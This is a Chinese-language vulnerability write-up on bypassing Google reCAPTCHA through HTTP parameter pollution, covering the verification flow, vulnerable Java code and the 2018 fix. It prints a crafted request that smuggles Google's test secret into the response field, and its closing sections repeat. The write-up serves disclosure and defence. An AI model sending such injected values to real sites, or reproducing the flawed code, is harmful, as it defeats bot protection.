利用HTTP参数污染绕过谷歌reCAPTCHA验证机制技术分析<\/h1>

1. reCAPTCHA验证机制概述<\/h2>

reCAPTCHA是谷歌提供的一项免费验证服务，用于Web应用开发者实现人机身份验证。其主要特点包括：<\/p>

提供多种验证形式（图片识别、数字验证等）<\/li>
通过API接口与网站集成<\/li>

验证流程分为前端验证和后端验证两部分<\/li> <\/ul>

2. 漏洞发现背景<\/h2>
该漏洞是通过对目标网站的渗透测试发现的，攻击者可以利用HTTP参数污染(HPP)技术绕过reCAPTCHA验证。<\/p>

3. 正常reCAPTCHA验证流程<\/h2>

用户在前端完成验证码挑战<\/li>

网站前端发送验证请求：

POST \/verify-recaptcha-response HTTP\/1.1
Host: vulnerable-app.com
recaptcha-response={reCAPTCHA-generated-hash}
<\/code><\/pre>
<\/li>
网站后端调用谷歌API验证：
POST \/recaptcha\/api\/siteverify HTTP\/1.1
Host: www.google.com
Content-Type: application\/x-www-form-urlencoded

recaptcha-response={reCAPTCHA-generated-hash}&secret={application-secret}
<\/code><\/pre>
<\/li>
谷歌返回验证结果：
{
<\/span><\/span>  "success"<\/span>: true<\/span>,
<\/span><\/span>  "challenge_ts"<\/span>: "2018-01-29T17:58:36Z"<\/span>,
<\/span><\/span>  "hostname"<\/span>: "..."<\/span>
<\/span><\/span>}
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
4. HTTP参数污染(HPP)技术原理<\/h2>
HTTP参数污染是指：<\/p>

网站接受用户输入并用于生成发往其他系统的HTTP请求<\/li>
不对用户输出进行充分校验<\/li>
不同系统对重复参数的处理方式不同<\/li>
<\/ul>
在本漏洞中，关键点是谷歌API对重复参数的处理方式：总是采用第一个出现的参数值<\/strong>。<\/p>
5. 漏洞利用关键要素<\/h2>
5.1 测试环境禁用reCAPTCHA的密钥<\/h3>
谷歌提供的测试用密钥：<\/p>
Site key: 6LeIxAcTAAAAAJcZVRqyHh71UMIEGNQ_MXjiZKhI
Secret key: 6LeIxAcTAAAAAGG-vFI1TnRWxMZNFuojJ4WifJWe
<\/code><\/pre>
5.2 漏洞利用条件<\/h3>

目标网站存在HTTP参数污染漏洞<\/li>
网站构建API请求URL时采用"response在前，secret在后"的顺序<\/li>
<\/ol>
5.3 典型易受攻击代码示例<\/h3>
private<\/span> String sendPost<\/span>(<\/span>String CaptchaResponse,<\/span> String Secret)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>    String url =<\/span> "https:\/\/www.google.com\/recaptcha\/api\/siteverify"<\/span>+<\/span>
<\/span><\/span>                 "?response="<\/span>+<\/span>CaptchaResponse+<\/span>
<\/span><\/span>                 "&secret="<\/span>+<\/span>Secret;<\/span>
<\/span><\/span>    URL obj =<\/span> new<\/span> URL(<\/span>url);<\/span>
<\/span><\/span>    HttpsURLConnection con =<\/span> (<\/span>HttpsURLConnection)<\/span> obj.<\/span>openConnection<\/span>();<\/span>
<\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>6. 漏洞利用步骤<\/h2>


构造恶意请求：<\/p>
POST \/verify-recaptcha-response HTTP\/1.1
Host: vulnerable-app.com
recaptcha-response=anything%26secret%3d6LeIxAcTAAAAAGG-vFI1TnRWxMZNFuojJ4WifJWe
<\/code><\/pre>
其中：<\/p>

anything<\/code> 为占位符<\/li>
%26<\/code> 是URL编码的&<\/code><\/li>
%3d<\/code> 是URL编码的=<\/code><\/li>
后面跟着测试用secret key<\/li>
<\/ul>
<\/li>

目标网站处理后发送给谷歌的请求：<\/p>
POST \/recaptcha\/api\/siteverify HTTP\/1.1
Host: www.google.com
Content-Type: application\/x-www-form-urlencoded

recaptcha-response=anything&secret=6LeIxAcTAAAAAGG-vFI1TnRWxMZNFuojJ4WifJWe&secret={real-secret}
<\/code><\/pre>
<\/li>

谷歌API处理时使用第一个secret参数（测试密钥），返回验证成功响应<\/p>
<\/li>
<\/ol>
7. 漏洞影响范围分析<\/h2>

约60%的reCAPTCHA集成存在HTTP参数污染风险<\/li>
其中约5-10%使用"response在前，secret在后"的参数顺序<\/li>
最终约3%的reCAPTCHA实现可被此漏洞利用<\/li>
<\/ul>
8. 谷歌修复方案<\/h2>
谷歌在API层面进行了修复：<\/p>

当检测到请求中包含重复参数时<\/li>
直接返回错误响应<\/li>
无需网站开发者更新补丁<\/li>
<\/ul>
9. 防御建议<\/h2>
9.1 对开发者的建议<\/h3>

避免使用字符串连接构建请求URL<\/li>
使用字典方式存储键值对<\/li>
对所有参数进行URL编码<\/li>
遵循"secret在前，response在后"的参数顺序<\/li>
<\/ol>
9.2 对安全测试人员的建议<\/h3>

测试所有用户输入点是否存在HPP漏洞<\/li>
特别关注参数顺序敏感的接口<\/li>
测试重复参数的处理逻辑<\/li>
<\/ol>
10. 漏洞时间线<\/h2>

2018年1月31日：漏洞报告提交给谷歌<\/li>
同日：谷歌要求提供更多测试证明<\/li>
2018年6月前：谷歌完成API层面修复<\/li>
<\/ul>
11. 技术总结<\/h2>
该漏洞展示了：<\/p>

参数处理顺序的重要性<\/li>
系统间参数处理差异导致的安全问题<\/li>
防御性编程的必要性<\/li>
API设计对安全的影响<\/li>
<\/ol>
通过此案例，开发者应更加重视HTTP参数的安全处理和API的健壮性设计。<\/p>

利用HTTP参数污染绕过谷歌reCAPTCHA验证机制技术分析<\/h1>

2. 漏洞发现背景<\/h2> 该漏洞是通过对目标网站的渗透测试发现的，攻击者可以利用HTTP参数污染(HPP)技术绕过reCAPTCHA验证。<\/p>

9. 防御建议<\/h2>

2. 漏洞发现背景<\/h2>
该漏洞是通过对目标网站的渗透测试发现的，攻击者可以利用HTTP参数污染(HPP)技术绕过reCAPTCHA验证。<\/p>